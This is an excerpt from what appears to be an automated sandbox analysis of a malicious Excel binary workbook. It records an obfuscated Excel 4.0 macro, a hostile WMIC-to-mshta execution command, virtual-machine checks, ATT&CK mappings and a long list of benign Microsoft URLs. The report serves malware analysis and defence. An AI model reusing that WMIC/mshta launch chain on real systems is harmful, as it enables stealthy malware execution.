Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=AQRFEVRUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
      Found obfuscated Excel 4.0 MacroShow sources
      Source: 4310352755503838173672.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 26
      Source: 4310352755503838173672.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_0F885B9E0_3_0F885B9E
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_0F8866480_3_0F886648
      Source: 4310352755503838173672.xlsbVirustotal: Detection: 39%
      Source: 4310352755503838173672.xlsbReversingLabs: Detection: 21%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\lvDMlIDBF.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"Jump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:128:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{4034AA48-0474-48B8-AD56-6C124AF9E283} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal96.troj.expl.evad.winXLSB@5/5@0/0
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 4310352755503838173672.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: 4310352755503838173672.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: lvdmlidbf.rtfJump to behavior
      Source: unknownProcess created: cmd line: lvdmlidbf.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}C&
      Source: EXCEL.EXE, 00000000.00000002.934018559.000000000DA01000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW8
      Source: EXCEL.EXE, 00000000.00000002.936007111.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773775862.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742682932.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653029275.000000000F793000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW1Fm
      Source: EXCEL.EXE, 00000000.00000002.936007111.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773775862.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742682932.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653029275.000000000F793000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: EXCEL.EXE, 00000000.00000003.654190436.000000000E19D000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: EXCEL.EXE, 00000000.00000002.927541557.00000000030E0000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.927488231.00000273370A0000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: EXCEL.EXE, 00000000.00000002.927541557.00000000030E0000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.927488231.00000273370A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.927541557.00000000030E0000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.927488231.00000273370A0000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: EXCEL.EXE, 00000000.00000002.927541557.00000000030E0000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.927488231.00000273370A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution2Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting3NTDSSystem Information Discovery4Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      4310352755503838173672.xlsb40%VirustotalBrowse
      4310352755503838173672.xlsb11%MetadefenderBrowse
      4310352755503838173672.xlsb21%ReversingLabsDocument-Excel.Trojan.XBAgent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://o365auditrealtimeingestion.manage.office.comBearer0%Avira URL Cloudsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize0%Avira URL Cloudsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://outlook.office.com2nA0%Avira URL Cloudsafe
      https://dataservice.o365filtering.comHa0%Avira URL Cloudsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.office.netYq10%Avira URL Cloudsafe
      https://api.addins.store.officeppe.com/addinstemplateD0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer0%Avira URL Cloudsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://substrate.office.comUm0%Avira URL Cloudsafe
      https://api.onedrive.comMBI0%Avira URL Cloudsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.0%Avira URL Cloudsafe
      https://api.aadrm.com/Kq#0%Avira URL Cloudsafe
      https://substrate.office.comP0%Avira URL Cloudsafe
      https://devnull.onenote.comMBI_SSL_SHORT0%Avira URL Cloudsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://dataservice.o365filtering.comvd0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://insertmedia.bing.office.net/odc/insertmediacEXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpfalse
        		high
        https://shell.suite.office.com:1443EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
          		high
          https://autodiscover-s.outlook.com/EXCEL.EXE, 00000000.00000003.742802680.000000000E1B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661707076.000000000E1B3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656483060.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934569051.000000000E1C3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660226396.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778360459.000000000E1B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852707651.000000000E1C3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652977431.000000000E137000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654190436.000000000E19D000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
            		high
            https://o365auditrealtimeingestion.manage.office.comBearerEXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934222214.000000000DFD0000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
              		high
              https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oauEXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpfalse
                		high
                https://cdn.entity.AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                • URL Reputation: safe
                		unknown
                https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorizeEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                  		high
                  https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                    		high
                    https://outlook.office.com2nAEXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                      		high
                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                        		high
                        https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/emEXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                          		high
                          https://dataservice.o365filtering.comHaEXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.EXCEL.EXE, 00000000.00000003.652896727.000000000E35C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655623912.000000000E35B000.00000004.00000001.sdmpfalse
                            		high
                            https://api.aadrm.com/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://substrate.office.com/search/api/v2/init=EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                              		high
                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                		high
                                https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, 00000000.00000002.934222214.000000000DFD0000.00000004.00000001.sdmpfalse
                                  		high
                                  https://api.microsoftstream.com/api/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                    		high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                      		high
                                      https://cr.office.comEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                        		high
                                        https://api.office.netYq1EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://login.windows.net/common/oauth2/authorizeC&EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpfalse
                                          		high
                                          https://api.addins.store.officeppe.com/addinstemplateDEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://res.getmicrosoftkey.com/api/redemptioneventsEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOfEXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                            		high
                                            https://tasks.office.comEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                              		high
                                              https://officeci.azurewebsites.net/api/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://login.windows.net/common/oauth2/authorize#EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                		high
                                                https://login.windows.net/common/oauth2/authorize$EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://login.windows.net/common/oauth2/authorize%EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://store.office.cn/addinstemplateEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://api.powerbi.com/v1.0/myorg/groupsBearerEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                          		high
